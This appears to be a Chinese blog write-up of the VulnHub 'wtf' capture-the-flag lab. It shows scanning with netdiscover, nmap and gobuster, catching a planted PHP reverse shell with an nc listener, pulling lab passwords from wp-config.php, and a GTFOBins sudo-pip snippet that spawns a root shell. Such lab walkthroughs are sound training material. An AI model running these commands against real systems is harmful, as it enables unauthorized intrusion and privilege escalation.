vulnhub之wtf的实践

  • A+
所属分类:安全文章

本周末实践的是vulnhub的wtf镜像,下载地址,https://download.vulnhub.com/wtf/wtf.rar,

用workstation打开,能扫描到地址,

sudo netdiscover -r 192.168.137.0/24,

vulnhub之wtf的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.75,

vulnhub之wtf的实践

再接着做目录爆破,这回用的gobuster,

需要先安装,sudo apt install gobuster,

然后还要安装爆破字典,sudo apt -y install seclists,

扫描,sudo gobuster dir --url http://192.168.137.75 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt,

vulnhub之wtf的实践

访问http://192.168.137.75/zhkh/,

vulnhub之wtf的实践

查看源码,发现wp-content子目录,

vulnhub之wtf的实践

继续扫描,sudo gobuster dir --url http://192.168.137.75/zhkh/wp-content -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt,

vulnhub之wtf的实践

访问http://192.168.137.75/zhkh/wp-content/uploads/,

vulnhub之wtf的实践

继续访问子目录,

vulnhub之wtf的实践

访问shell.php,并抓包,

vulnhub之wtf的实践

发现反弹shell的接收端是192.168.1.14,端口是5555,

重新部署靶机和kali攻击机,都放到192.168.1.0/24网段里,

且配置kali攻击机的地址为192.168.1.14,靶机dhcp,

重新做地址扫描,sudo netdiscover -r 192.168.1.0/24,

vulnhub之wtf的实践

访问http://192.168.1.128/zhkh/wp-content/uploads/,

在kali攻击机上开一个监听,sudo nc -nlvp 5555,

然后再次访问shell.php,就拿到了shell,

vulnhub之wtf的实践

不是root,需要提权,查看文件,

vulnhub之wtf的实践

从wp-config.php里查看到有用信息,ra/912391929129,

vulnhub之wtf的实践

以及另一个类似密码的东西,`Db]f{He3HgO`(z,

vulnhub之wtf的实践

发现ra/`Db]f{He3HgO`(z可ssh登录,并且pip是以root权限运行的,

vulnhub之wtf的实践

从https://gtfobins.github.io/gtfobins/pip/上找到提权代码,

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

提权成功,

vulnhub之wtf的实践

本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之wtf的实践

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: